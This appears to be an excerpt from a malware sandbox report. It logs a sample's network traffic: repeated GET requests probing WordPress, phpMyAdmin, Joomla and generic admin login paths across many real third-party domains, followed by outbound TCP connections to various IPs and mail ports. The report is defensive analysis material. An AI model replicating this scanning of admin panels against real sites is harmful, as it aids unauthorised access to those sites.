                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/administrator/
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://mcsmk8.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://jumpnsplashwear.com/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: www.pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: www.pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://eremina.net/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: khodyari.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: mgnbizlaw.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-login.php HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: mcsmk8.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: ASP.NET_SessionId=oapnk3hjjknady5gfqszwsoqUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipCookie: ASP.NET_SessionId=z5yl5z5srju4rf2wkb4qhiw2User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://bokod.hu/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: fedyanin.wsAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: bokod.huAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ext.byAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: ershov.orgAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: http://ershov.org/wp-login.php
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: pfprojekt.skAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: la-morada.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin.php HTTP/1.1Host: eremina.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /admin HTTP/1.1Host: malibusands.netAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: jumpnsplashwear.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: 3marc.comAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET /pma/ HTTP/1.1Host: evropskypravnik.czAccept: */*Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=6530a3599e222b6309996aa926711913User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: conceptualintegration.comAccept: */*Accept-Encoding: deflate, gzipCookie: PHPSESSID=178c8119ea482728a830be8f8316be27User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                      Source: Joe Sandbox ViewASN Name: SSASN2US SSASN2US
                      Source: Joe Sandbox ViewIP Address: 69.160.38.2 69.160.38.2
                      Source: Joe Sandbox ViewIP Address: 185.220.100.251 185.220.100.251
                      Source: Joe Sandbox ViewIP Address: 45.66.33.45 45.66.33.45
                      Source: unknownNetwork traffic detected: DNS query count 259
                      Source: global trafficTCP traffic: 192.168.2.6:49722 -> 193.233.132.48:24324
                      Source: global trafficTCP traffic: 192.168.2.6:49731 -> 185.220.101.198:10198
                      Source: global trafficTCP traffic: 192.168.2.6:49775 -> 185.220.100.251:9000
                      Source: global trafficTCP traffic: 192.168.2.6:49782 -> 62.210.83.207:8080
                      Source: global trafficTCP traffic: 192.168.2.6:49785 -> 199.184.215.11:9090
                      Source: global trafficTCP traffic: 192.168.2.6:52584 -> 15.197.142.173:143
                      Source: global trafficTCP traffic: 192.168.2.6:52586 -> 3.64.163.50:143
                      Source: global trafficTCP traffic: 192.168.2.6:52603 -> 66.115.173.188:143
                      Source: global trafficTCP traffic: 192.168.2.6:53769 -> 178.172.160.19:143
                      Source: global trafficTCP traffic: 192.168.2.6:53799 -> 69.160.38.2:995
                      Source: global trafficTCP traffic: 192.168.2.6:54024 -> 195.68.234.252:143
                      Source: unknownNetwork traffic detected: IP country count 14
